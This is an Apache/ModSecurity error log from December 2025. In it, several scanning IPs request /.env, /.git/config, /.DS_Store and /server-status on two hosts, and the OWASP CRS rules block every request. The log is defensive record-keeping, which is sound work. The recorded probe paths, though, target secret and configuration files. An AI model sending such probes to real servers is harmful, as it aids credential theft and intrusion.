[Fri Dec 19 21:28:39.536247 2025] [:error] [pid 839890] [client 204.76.203.25:55230] [client 204.76.203.25] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUW1d4QStO_v-3hKEQTFHgAAAAk"]
[Fri Dec 19 21:28:39.536520 2025] [:error] [pid 839890] [client 204.76.203.25:55230] [client 204.76.203.25] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUW1d4QStO_v-3hKEQTFHgAAAAk"]
[Fri Dec 19 21:28:39.536685 2025] [:error] [pid 839890] [client 204.76.203.25:55230] [client 204.76.203.25] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUW1d4QStO_v-3hKEQTFHgAAAAk"]
[Sat Dec 20 05:40:09.032160 2025] [authz_core:error] [pid 857308] [client 64.23.218.208:45084] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Dec 20 05:40:12.051400 2025] [:error] [pid 857287] [client 64.23.218.208:60752] [client 64.23.218.208] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUYorD8tfwrk48OAesWKOAAAAAo"]
[Sat Dec 20 05:40:12.052295 2025] [:error] [pid 857287] [client 64.23.218.208:60752] [client 64.23.218.208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUYorD8tfwrk48OAesWKOAAAAAo"]
[Sat Dec 20 05:40:12.052472 2025] [:error] [pid 857287] [client 64.23.218.208:60752] [client 64.23.218.208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUYorD8tfwrk48OAesWKOAAAAAo"]
[Sat Dec 20 05:40:13.037892 2025] [:error] [pid 856674] [client 64.23.218.208:60754] [client 64.23.218.208] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUYorYZm9d0FY_hp4zY1kgAAAAA"]
[Sat Dec 20 05:40:13.038132 2025] [:error] [pid 856674] [client 64.23.218.208:60754] [client 64.23.218.208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUYorYZm9d0FY_hp4zY1kgAAAAA"]
[Sat Dec 20 05:40:13.038286 2025] [:error] [pid 856674] [client 64.23.218.208:60754] [client 64.23.218.208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUYorYZm9d0FY_hp4zY1kgAAAAA"]
[Sat Dec 20 05:40:15.041875 2025] [:error] [pid 857293] [client 64.23.218.208:60764] [client 64.23.218.208] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUYor4wzYS-2Oqd5dh3-qQAAABA"]
[Sat Dec 20 05:40:15.042134 2025] [:error] [pid 857293] [client 64.23.218.208:60764] [client 64.23.218.208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUYor4wzYS-2Oqd5dh3-qQAAABA"]
[Sat Dec 20 05:40:15.042287 2025] [:error] [pid 857293] [client 64.23.218.208:60764] [client 64.23.218.208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUYor4wzYS-2Oqd5dh3-qQAAABA"]
[Sat Dec 20 07:18:23.910528 2025] [authz_core:error] [pid 856675] [client 46.101.1.225:36044] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Dec 20 07:18:26.924037 2025] [:error] [pid 857293] [client 46.101.1.225:36074] [client 46.101.1.225] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUY_sowzYS-2Oqd5dh3-twAAABA"]
[Sat Dec 20 07:18:26.924999 2025] [:error] [pid 857293] [client 46.101.1.225:36074] [client 46.101.1.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUY_sowzYS-2Oqd5dh3-twAAABA"]
[Sat Dec 20 07:18:26.925201 2025] [:error] [pid 857293] [client 46.101.1.225:36074] [client 46.101.1.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUY_sowzYS-2Oqd5dh3-twAAABA"]
[Sat Dec 20 07:18:27.915215 2025] [:error] [pid 857290] [client 46.101.1.225:36090] [client 46.101.1.225] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUY_sybsPSl6AuAMnb6oWAAAAA0"]
[Sat Dec 20 07:18:27.915563 2025] [:error] [pid 857290] [client 46.101.1.225:36090] [client 46.101.1.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUY_sybsPSl6AuAMnb6oWAAAAA0"]
[Sat Dec 20 07:18:27.915776 2025] [:error] [pid 857290] [client 46.101.1.225:36090] [client 46.101.1.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUY_sybsPSl6AuAMnb6oWAAAAA0"]
[Sat Dec 20 07:18:29.926547 2025] [:error] [pid 856674] [client 46.101.1.225:43766] [client 46.101.1.225] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUY_tYZm9d0FY_hp4zY1oAAAAAA"]
[Sat Dec 20 07:18:29.926779 2025] [:error] [pid 856674] [client 46.101.1.225:43766] [client 46.101.1.225] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUY_tYZm9d0FY_hp4zY1oAAAAAA"]
[Sat Dec 20 07:18:29.926927 2025] [:error] [pid 856674] [client 46.101.1.225:43766] [client 46.101.1.225] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUY_tYZm9d0FY_hp4zY1oAAAAAA"]
[Sat Dec 20 07:18:39.714331 2025] [authz_core:error] [pid 857293] [client 134.209.25.199:55094] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Dec 20 07:18:42.732026 2025] [:error] [pid 856676] [client 134.209.25.199:55124] [client 134.209.25.199] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUY_wmetN_MHWIowB3WUYQAAAAI"]
[Sat Dec 20 07:18:42.732255 2025] [:error] [pid 856676] [client 134.209.25.199:55124] [client 134.209.25.199] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUY_wmetN_MHWIowB3WUYQAAAAI"]
[Sat Dec 20 07:18:42.732405 2025] [:error] [pid 856676] [client 134.209.25.199:55124] [client 134.209.25.199] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUY_wmetN_MHWIowB3WUYQAAAAI"]
[Sat Dec 20 07:18:43.718301 2025] [:error] [pid 857308] [client 134.209.25.199:55132] [client 134.209.25.199] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUY_w25vX0qxwKCkkaVjnQAAAAQ"]
[Sat Dec 20 07:18:43.718534 2025] [:error] [pid 857308] [client 134.209.25.199:55132] [client 134.209.25.199] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUY_w25vX0qxwKCkkaVjnQAAAAQ"]
[Sat Dec 20 07:18:43.718686 2025] [:error] [pid 857308] [client 134.209.25.199:55132] [client 134.209.25.199] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUY_w25vX0qxwKCkkaVjnQAAAAQ"]
[Sat Dec 20 07:18:45.715865 2025] [:error] [pid 857290] [client 134.209.25.199:55138] [client 134.209.25.199] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUY_xSbsPSl6AuAMnb6oWwAAAA0"]
[Sat Dec 20 07:18:45.716105 2025] [:error] [pid 857290] [client 134.209.25.199:55138] [client 134.209.25.199] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUY_xSbsPSl6AuAMnb6oWwAAAA0"]
[Sat Dec 20 07:18:45.716272 2025] [:error] [pid 857290] [client 134.209.25.199:55138] [client 134.209.25.199] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUY_xSbsPSl6AuAMnb6oWwAAAA0"]
[Sat Dec 20 08:25:35.619798 2025] [authz_core:error] [pid 856677] [client 147.182.149.75:37686] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Dec 20 08:25:38.620530 2025] [:error] [pid 857290] [client 147.182.149.75:48212] [client 147.182.149.75] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUZPcibsPSl6AuAMnb6obQAAAA0"]
[Sat Dec 20 08:25:38.620762 2025] [:error] [pid 857290] [client 147.182.149.75:48212] [client 147.182.149.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUZPcibsPSl6AuAMnb6obQAAAA0"]
[Sat Dec 20 08:25:38.620945 2025] [:error] [pid 857290] [client 147.182.149.75:48212] [client 147.182.149.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUZPcibsPSl6AuAMnb6obQAAAA0"]
[Sat Dec 20 08:25:39.619858 2025] [:error] [pid 857293] [client 147.182.149.75:48220] [client 147.182.149.75] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUZPc4wzYS-2Oqd5dh3-zQAAABA"]
[Sat Dec 20 08:25:39.620080 2025] [:error] [pid 857293] [client 147.182.149.75:48220] [client 147.182.149.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUZPc4wzYS-2Oqd5dh3-zQAAABA"]
[Sat Dec 20 08:25:39.620241 2025] [:error] [pid 857293] [client 147.182.149.75:48220] [client 147.182.149.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUZPc4wzYS-2Oqd5dh3-zQAAABA"]
[Sat Dec 20 08:25:41.621398 2025] [:error] [pid 857289] [client 147.182.149.75:48222] [client 147.182.149.75] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUZPdUcesDQvflsX-zh5UwAAAAw"]
[Sat Dec 20 08:25:41.621616 2025] [:error] [pid 857289] [client 147.182.149.75:48222] [client 147.182.149.75] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUZPdUcesDQvflsX-zh5UwAAAAw"]
[Sat Dec 20 08:25:41.621764 2025] [:error] [pid 857289] [client 147.182.149.75:48222] [client 147.182.149.75] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUZPdUcesDQvflsX-zh5UwAAAAw"]
